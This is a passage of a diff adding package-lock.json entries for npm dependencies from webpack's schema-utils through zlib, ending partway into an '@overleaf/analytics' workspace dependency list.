+ "node_modules/webpack/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/websocket-driver": { + "version": "0.7.4", + "resolved": "https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz", + "integrity": "sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "http-parser-js": ">=0.5.1", + "safe-buffer": ">=5.1.0", + "websocket-extensions": ">=0.1.1" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/websocket-extensions": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz", + "integrity": "sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/whatwg-encoding": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/whatwg-encoding/-/whatwg-encoding-2.0.0.tgz", + "integrity": "sha512-p41ogyeMUrw3jWclHWTQg1k05DSVXPLcVxRTYsXUk+ZooOCZLcoYgPZ/HL/D/N+uQPOtcp1me1WhBEaX02mhWg==", + "dev": true, + "dependencies": { + "iconv-lite": "0.6.3" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/whatwg-encoding/node_modules/iconv-lite": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.6.3.tgz", + "integrity": "sha512-4fCk79wshMdzMp2rH06qWrJE4iolqLhCUH+OiuIgU++RB0+94NlDL81atO7GX55uUKueo0txHNtvEyI6D7WdMw==", + "dev": true, + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/whatwg-mimetype": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/whatwg-mimetype/-/whatwg-mimetype-3.0.0.tgz", + "integrity": "sha512-nt+N2dzIutVRxARx1nghPKGv1xHikU7HKdfafKkLNLindmPU/ch3U31NOCGGA/dmPcmb1VlofO0vnKAcsm0o/Q==", + "dev": true, + "engines": { + "node": ">=12" + } + }, + "node_modules/which": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "node-which": "bin/node-which" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/which-boxed-primitive": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/which-boxed-primitive/-/which-boxed-primitive-1.0.2.tgz", + "integrity": "sha512-bwZdv0AKLpplFY2KZRX6TvyuN7ojjr7lwkg6ml0roIy9YeuSr7JS372qlNW18UQYzgYK9ziGcerWqZOmEn9VNg==", + "dependencies": { + "is-bigint": "^1.0.1", + "is-boolean-object": "^1.1.0", + "is-number-object": "^1.0.4", + "is-string": "^1.0.5", + "is-symbol": "^1.0.3" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-builtin-type": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/which-builtin-type/-/which-builtin-type-1.1.3.tgz", + "integrity": "sha512-YmjsSMDBYsM1CaFiayOVT06+KJeXf0o5M/CAd4o1lTadFAtacTUM49zoYxr/oroopFDfhvN6iEcBxUyc3gvKmw==", + "dev": true, + "dependencies": { + "function.prototype.name": "^1.1.5", + "has-tostringtag": "^1.0.0", + "is-async-function": "^2.0.0", + "is-date-object": "^1.0.5", + "is-finalizationregistry": "^1.0.2", + "is-generator-function": "^1.0.10", + "is-regex": "^1.1.4", + "is-weakref": "^1.0.2", + "isarray": "^2.0.5", + "which-boxed-primitive": "^1.0.2", + "which-collection": "^1.0.1", + "which-typed-array": "^1.1.9" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-collection": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/which-collection/-/which-collection-1.0.1.tgz", + "integrity": "sha512-W8xeTUwaln8i3K/cY1nGXzdnVZlidBcagyNFtBdD5kxnb4TvGKR7FfSIS3mYpwWS1QUCutfKz8IY8RjftB0+1A==", + "dev": true, + "dependencies": { + "is-map": "^2.0.1", + "is-set": "^2.0.1", + "is-weakmap": "^2.0.1", + "is-weakset": "^2.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-module": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/which-module/-/which-module-2.0.0.tgz", + "integrity": "sha1-2e8H3Od7mQK4o6j6SzHD4/fm6Ho=", + "dev": true + }, + "node_modules/which-typed-array": { + "version": "1.1.15", + "resolved": "https://registry.npmjs.org/which-typed-array/-/which-typed-array-1.1.15.tgz", + "integrity": "sha512-oV0jmFtUky6CXfkqehVvBP/LSWJ2sy4vWMioiENyJLePrBO/yKyV9OyJySfAKosh+RYkIl5zJCNZ8/4JncrpdA==", + "license": "MIT", + "dependencies": { + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-tostringtag": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/wide-align": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.3.tgz", + "integrity": "sha512-QGkOQc8XL6Bt5PwnsExKBPuMKBxnGxWWW3fU55Xt4feHozMUhdUMaBCk290qpm/wG5u/RSKzwdAC4i51YigihA==", + "dependencies": { + "string-width": "^1.0.2 || 2" + } + }, + "node_modules/wide-align/node_modules/ansi-regex": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.1.tgz", + "integrity": "sha512-+O9Jct8wf++lXxxFc4hc8LsjaSq0HFzzL7cVsw8pRDIPdjKD2mT4ytDZlLuSBZ4cLKZFXIrMGO7DbQCtMJJMKw==", + "engines": { + "node": ">=4" + } + }, + "node_modules/wide-align/node_modules/is-fullwidth-code-point": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-2.0.0.tgz", + "integrity": "sha1-o7MKXE8ZkYMWeqq5O+764937ZU8=", + "engines": { + "node": ">=4" + } + }, + "node_modules/wide-align/node_modules/string-width": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-2.1.1.tgz", + "integrity": "sha512-nOqH59deCq9SRHlxq1Aw85Jnt4w6KvLKqWVik6oA9ZklXLNIOlqg4F2yrT1MVaTjAqvVwdfeZ7w7aCvJD7ugkw==", + "dependencies": { + "is-fullwidth-code-point": "^2.0.0", + "strip-ansi": "^4.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/wide-align/node_modules/strip-ansi": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-4.0.0.tgz", + "integrity": "sha1-qEeQIusaw2iocTibY1JixQXuNo8=", + "dependencies": { + "ansi-regex": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/wildcard": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/wildcard/-/wildcard-1.1.2.tgz", + "integrity": "sha1-pwIEUwhNjNLv5wup02liY94XEKU=", + "dev": true + }, + "node_modules/with": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/with/-/with-7.0.2.tgz", + "integrity": "sha512-RNGKj82nUPg3g5ygxkQl0R937xLyho1J24ItRCBTr/m1YnZkzJy1hUiHUJrc/VlsDQzsCnInEGSg3bci0Lmd4w==", + "dependencies": { + "@babel/parser": "^7.9.6", + "@babel/types": "^7.9.6", + "assert-never": "^1.2.1", + "babel-walk": "3.0.0-canary-5" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/wkx": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/wkx/-/wkx-0.5.0.tgz", + "integrity": "sha512-Xng/d4Ichh8uN4l0FToV/258EjMGU9MGcA0HV2d9B/ZpZB3lqQm7nkOdZdm5GhKtLLhAE7PiVQwN4eN+2YJJUg==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/word-wrap": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.5.tgz", + "integrity": "sha512-BN22B5eaMMI9UMtjrGd5g5eCYPpCPDUy0FJXbYsaT5zYxjFOckS53SQDE3pWkVoWpHXVb3BrYcEN4Twa55B5cA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/wordwrap": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/wordwrap/-/wordwrap-1.0.0.tgz", + "integrity": "sha1-J1hIEIkUVqQXHI0CJkQa3pDLyus=", + "dev": true + }, + "node_modules/workerpool": { + "version": "6.5.1", + "resolved": "https://registry.npmjs.org/workerpool/-/workerpool-6.5.1.tgz", + "integrity": "sha512-Fs4dNYcsdpYSAfVxhnl1L5zTksjvOJxtC5hzMNl+1t9B8hTJTdKDyZ5ju7ztgPy+ft9tBFXoOlDNiOT9WUXZlA==", + "license": "Apache-2.0" + }, + "node_modules/wrap-ansi": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, + "node_modules/wrap-ansi-cjs": { + "name": "wrap-ansi", + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, + "node_modules/wrap-ansi-cjs/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/wrap-ansi/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" + }, + "node_modules/write-file-atomic": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.1.tgz", + "integrity": "sha512-+QU2zd6OTD8XWIJCbffaiQeH9U73qIqafo1x6V1snCWYGJf6cVE0cDR4D8xRzcEnfI21IFrUPzPGtcPf8AC+Rw==", + "dev": true, + "dependencies": { + "imurmurhash": "^0.1.4", + "signal-exit": "^4.0.1" + }, + "engines": { + "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + } + }, + "node_modules/write-file-atomic/node_modules/signal-exit": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", + "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", + "dev": true, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/ws": { + "version": "8.18.0", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", + "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "dev": true, + "engines": { + "node": ">=10.0.0" + }, + "peerDependencies": { + "bufferutil": "^4.0.1", + "utf-8-validate": ">=5.0.2" + }, + "peerDependenciesMeta": { + "bufferutil": { + "optional": true + }, + "utf-8-validate": { + "optional": true + } + } + }, + "node_modules/x-xss-protection": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/x-xss-protection/-/x-xss-protection-1.3.0.tgz", + "integrity": "sha512-kpyBI9TlVipZO4diReZMAHWtS0MMa/7Kgx8hwG/EuZLiA6sg4Ah/4TRdASHhRRN3boobzcYgFRUFSgHRge6Qhg==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/xml-crypto": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/xml-crypto/-/xml-crypto-3.2.1.tgz", + "integrity": "sha512-0GUNbPtQt+PLMsC5HoZRONX+K6NBJEqpXe/lsvrFj0EqfpGPpVfJKGE7a5jCg8s2+Wkrf/2U1G41kIH+zC9eyQ==", + "license": "MIT", + "dependencies": { + "@xmldom/xmldom": "^0.8.8", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/xml-crypto/node_modules/@xmldom/xmldom": { + "version": "0.8.10", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.10.tgz", + "integrity": "sha512-2WALfTl4xo2SkGCYRt6rDTFfk9R1czmBvUQy12gK2KuRKIpWEhcbbzy8EZXtz/jkRqHX8bFEc6FC1HjX4TUWYw==", + "license": "MIT", + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/xml-crypto/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/xml-encryption": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/xml-encryption/-/xml-encryption-2.0.0.tgz", + "integrity": "sha512-4Av83DdvAgUQQMfi/w8G01aJshbEZP9ewjmZMpS9t3H+OCZBDvyK4GJPnHGfWiXlArnPbYvR58JB9qF2x9Ds+Q==", + "dependencies": { + "@xmldom/xmldom": "^0.7.0", + "escape-html": "^1.0.3", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/xml-encryption/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/xml-name-validator": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/xml-name-validator/-/xml-name-validator-4.0.0.tgz", + "integrity": "sha512-ICP2e+jsHvAj2E2lIHxa5tjXRlKDJo4IdvPvCXbXQGdzSfmSpNVyIKMvoZHjDY9DP0zV17iI85o90vRFXNccRw==", + "dev": true, + "engines": { + "node": ">=12" + } + }, + "node_modules/xml2js": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", + "dependencies": { + "sax": ">=0.6.0", + "xmlbuilder": "~11.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/xml2js/node_modules/xmlbuilder": { + "version": "11.0.1", + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-11.0.1.tgz", + "integrity": "sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/xmlbuilder": { + "version": "15.1.1", + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-15.1.1.tgz", + "integrity": "sha512-yMqGBqtXyeN1e3TGYvgNgDVZ3j84W4cwkOXQswghol6APgZWaff9lnbvN7MHYJOiXsvGPXtjTYJEiC9J2wv9Eg==", + "engines": { + "node": ">=8.0" + } + }, + "node_modules/xmlchars": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/xmlchars/-/xmlchars-2.2.0.tgz", + "integrity": "sha512-JZnDKK8B0RCDw84FNdDAIpZK+JuJw+s7Lz8nksI7SIuU3UXJJslUthsi+uWBUYOwPFwW7W7PRLRfUKpxjtjFCw==", + "dev": true + }, + "node_modules/xmlcreate": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/xmlcreate/-/xmlcreate-2.0.4.tgz", + "integrity": "sha512-nquOebG4sngPmGPICTS5EnxqhKbCmz5Ox5hsszI2T6U5qdrJizBc+0ilYSEjTSzU0yZcmvppztXe/5Al5fUwdg==" + }, + "node_modules/xmlhttprequest": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/xmlhttprequest/-/xmlhttprequest-1.8.0.tgz", + "integrity": "sha512-58Im/U0mlVBLM38NdZjHyhuMtCqa61469k2YP/AaPbvCoV9aQGUpbJBj1QRm2ytRiVQBD/fsw7L2bJGDVQswBA==", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/xorshift": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/xorshift/-/xorshift-1.2.0.tgz", + "integrity": "sha512-iYgNnGyeeJ4t6U11NpA/QiKy+PXn5Aa3Azg5qkwIFz1tBLllQrjjsk9yzD7IAK0naNU4JxdeDgqW9ov4u/hc4g==" + }, + "node_modules/xpath": { + "version": "0.0.5", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.5.tgz", + "integrity": "sha1-RUA29u8PPfWvXUukoRn7dWdLPmw=", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/xregexp": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/xregexp/-/xregexp-4.4.1.tgz", + "integrity": "sha512-2u9HwfadaJaY9zHtRRnH6BY6CQVNQKkYm3oLtC9gJXXzfsbACg5X5e4EZZGVAH+YIfa+QA9lsFQTTe3HURF3ag==", + "dependencies": { + "@babel/runtime-corejs3": "^7.12.1" + } + }, + "node_modules/xtend": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==", + "engines": { + "node": ">=0.4" + } + }, + "node_modules/y18n": { + "version": "5.0.8", + "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", + "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "engines": { + "node": ">=10" + } + }, + "node_modules/yallist": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==" + }, + "node_modules/yaml": { + "version": "1.10.2", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", + "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/yargs": { + "version": "17.7.2", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", + "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "dependencies": { + "cliui": "^8.0.1", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.3", + "y18n": "^5.0.5", + "yargs-parser": "^21.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/yargs-parser": { + "version": "20.2.4", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-20.2.4.tgz", + "integrity": "sha512-WOkpgNhPTlE73h4VFAFsOnomJVaovO8VqLDzy5saChRBFQFBoMYirowyW+Q9HB4HFF4Z7VZTiG3iSzJJA29yRA==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/yargs-unparser": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/yargs-unparser/-/yargs-unparser-2.0.0.tgz", + "integrity": "sha512-7pRTIA9Qc1caZ0bZ6RYRGbHJthJWuakf+WmHK0rVeLkNrrGhfoabBNdue6kdINI6r4if7ocq9aD/n7xwKOdzOA==", + "dev": true, + "license": "MIT", + "dependencies": { + "camelcase": "^6.0.0", + "decamelize": "^4.0.0", + "flat": "^5.0.2", + "is-plain-obj": "^2.1.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/yargs-unparser/node_modules/decamelize": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/decamelize/-/decamelize-4.0.0.tgz", + "integrity": "sha512-9iE1PgSik9HeIIw2JO94IidnE3eBoQrFJ3w7sFuzSX4DpmZ3v5sZpUiV5Swcf6mQEF+Y0ru8Neo+p+nyh2J+hQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/yargs/node_modules/cliui": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", + "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.1", + "wrap-ansi": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/yargs/node_modules/yargs-parser": { + "version": "21.1.1", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "engines": { + "node": ">=12" + } + }, + "node_modules/yauzl": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-2.10.0.tgz", + "integrity": "sha1-x+sXyT4RLLEIb6bY5R+wZnt5pfk=", + "dependencies": { + "buffer-crc32": "~0.2.3", + "fd-slicer": "~1.1.0" + } + }, + "node_modules/yocto-queue": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", + "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/yup": { + "version": "0.32.11", + "resolved": "https://registry.npmjs.org/yup/-/yup-0.32.11.tgz", + "integrity": "sha512-Z2Fe1bn+eLstG8DRR6FTavGD+MeAwyfmouhHsIUgaADz8jvFKbO/fXc2trJKZg+5EBjh4gGm3iU/t3onKlXHIg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.15.4", + "@types/lodash": "^4.14.175", + "lodash": "^4.17.21", + "lodash-es": "^4.17.21", + "nanoclone": "^0.2.1", + "property-expr": "^2.0.4", + "toposort": "^2.0.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/z-schema": { + "version": "3.25.1", + "resolved": "https://registry.npmjs.org/z-schema/-/z-schema-3.25.1.tgz", + "integrity": "sha512-7tDlwhrBG+oYFdXNOjILSurpfQyuVgkRe3hB2q8TEssamDHB7BbLWYkYO98nTn0FibfdFroFKDjndbgufAgS/Q==", + "dependencies": { + "core-js": "^2.5.7", + "lodash.get": "^4.0.0", + "lodash.isequal": "^4.0.0", + "validator": "^10.0.0" + }, + "bin": { + "z-schema": "bin/z-schema" + }, + "optionalDependencies": { + "commander": "^2.7.1" + } + }, + "node_modules/z-schema/node_modules/commander": { + "version": "2.20.3", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==", + "optional": true + }, + "node_modules/z-schema/node_modules/core-js": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/core-js/-/core-js-2.6.12.tgz", + "integrity": "sha512-Kb2wC0fvsWfQrgk8HU5lW6U/Lcs8+9aaYcy4ZFc6DDlo4nZ7n70dEgE5rtR0oG6ufKDUnrwfWL1mXR5ljDatrQ==", + "deprecated": "core-js@<3.4 is no longer maintained and not recommended for usage due to the number of issues. Because of the V8 engine whims, feature detection in old core-js versions could cause a slowdown up to 100x even if nothing is polyfilled. Please, upgrade your dependencies to the actual version of core-js.", + "hasInstallScript": true + }, + "node_modules/z-schema/node_modules/validator": { + "version": "10.11.0", + "resolved": "https://registry.npmjs.org/validator/-/validator-10.11.0.tgz", + "integrity": "sha512-X/p3UZerAIsbBfN/IwahhYaBbY68EN/UQBWHtsbXGT5bfrH/p4NQzUCG1kF/rtKaNpnJ7jAu6NGTdSNtyNIXMw==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/zip-stream": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/zip-stream/-/zip-stream-4.1.0.tgz", + "integrity": "sha512-zshzwQW7gG7hjpBlgeQP9RuyPGNxvJdzR8SUM3QhxCnLjWN2E7j3dOvpeDcQoETfHx0urRS7EtmVToql7YpU4A==", + "dependencies": { + "archiver-utils": "^2.1.0", + "compress-commons": "^4.1.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/zlib": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/zlib/-/zlib-1.0.5.tgz", + "integrity": "sha512-40fpE2II+Cd3k8HWTWONfeKE2jL+P42iWJ1zzps5W51qcTsOUKM5Q5m2PFb0CLxlmFAaUuUdJGc3OfZy947v0w==", + "hasInstallScript": true, + "engines": { + "node": ">=0.2.0" + } + }, + "services/analytics": { + "name": "@overleaf/analytics", + "dependencies": { + "@customerio/cdp-analytics-node": "^0.3.0", + "@google-cloud/bigquery": "^5.9.0", + "@google-cloud/storage": "^6.10.1", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "bluebird": "^3.7.2", + "body-parser": "^1.20.3", + "bull": "^3.18.0", + "camelcase-keys": "^4.2.0", + "celebrate": "^15.0.3", + "csv": "^5.4.0", + "east": "^2.0.3", + "express": "^4.21.2", + "joi": "^17.12.0", + "json2csv": "^4.5.4", + "lodash": "^4.17.21", + "minimist": "^1.2.7", + "mixpanel": "^0.13.0", + "moment": "^2.29.4", + "mongodb": "6.12.0", + "p-limit": "^2.3.0", + "pg": "^8.7.1", + "pg-copy-streams": "^2.2.2", + "promptly": "^3.0.3", + "recurly": "^4.0.1", + "request": 